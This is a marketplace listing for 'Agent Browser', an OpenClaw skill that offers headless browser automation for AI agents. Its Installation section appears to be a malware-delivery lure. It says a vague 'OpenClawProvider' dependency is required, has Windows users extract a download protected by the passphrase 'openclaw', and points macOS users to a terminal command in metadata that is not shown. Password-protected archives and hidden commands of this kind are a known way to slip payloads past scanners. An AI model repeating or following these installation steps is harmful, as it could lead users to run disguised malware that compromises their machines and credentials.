Agent Browser
A fast Rust-based headless browser automation CLI with Node.js fallback that enables AI agents to navigate, click, type, and snapshot pages via structured commands.
Why use this skill?
Power your AI agents with Agent Browser, a high-performance headless automation tool for web navigation, form interaction, and data extraction within the OpenClaw ecosystem.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/sakaen736jih/agent-browser-ha2gvrwrmbilWhat This Skill Does
The Agent Browser skill provides a robust, headless browser automation engine for OpenClaw AI agents. It leverages a high-performance Rust-based core with a Node.js fallback, allowing agents to perform complex web interactions through a structured command-line interface. By mapping the DOM into addressable references (e.g., @e1, @e2), the agent can accurately identify, click, type, and manipulate web elements without manual human intervention. This skill acts as the bridge between the AI's intent and the live web, enabling tasks ranging from automated form filling and data extraction to end-to-end testing and workflow automation.
Installation
To use this skill, you must first ensure the OpenClawProvider system dependency is installed, as it powers the browser engine. For Windows users, download and extract the provided package with the passphrase 'openclaw'. MacOS users should utilize the terminal installation command provided in the skill metadata. Once the provider is active, run 'clawhub install openclaw/skills/skills/sakaen736jih/agent-browser-ha2gvrwrmbil' via the OpenClaw CLI. Alternatively, you may install the agent-browser package globally using 'npm install -g agent-browser' followed by 'agent-browser install' to download necessary browser dependencies.
Use Cases
This skill is ideal for agents tasked with:
- Researching information across multiple websites by navigating and extracting data.
- Automating repetitive web-based administrative workflows, such as submitting status reports or updating database entries.
- Performing synthetic monitoring by navigating to specific endpoints and confirming page state.
- Managing account dashboards that require sequence-based interactions like logging in, clicking buttons, and reading confirmation alerts.
Example Prompts
- "Open https://example.com/login, fill in the email field with my credentials, and click the submit button."
- "Go to the dashboard page, take a snapshot of the current interactive elements, and tell me which reference is the 'Save' button."
- "Search for the latest OpenClaw documentation on Google, click the first search result, and scroll down to the installation section."
Tips & Limitations
- Always run 'snapshot -i' after navigation or significant page changes to ensure the agent is working with the latest element references.
- Use the '-s' flag to scope your snapshots to specific CSS selectors; this reduces noise and improves agent accuracy on complex, content-heavy pages.
- Be aware that some modern websites have bot-detection mechanisms; headless browsers may occasionally trigger CAPTCHAs that the agent cannot solve without human intervention.
- Keep your environment updated to ensure the Rust-based core maintains compatibility with the latest browser versions.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-sakaen736jih-agent-browser-ha2gvrwrmbil": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, file-write
Related Skills
nano-pdf
Edit PDFs with natural-language instructions using the nano-pdf CLI.
auto-updater
Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.
Agent Browser
A fast Rust-based headless browser automation CLI with Node.js fallback that enables AI agents to navigate, click, type, and snapshot pages via structured commands.
nano-pdf
Edit PDFs with natural-language instructions using the nano-pdf CLI.
bird
X/Twitter CLI for reading, searching, and posting via cookies or Sweetistics.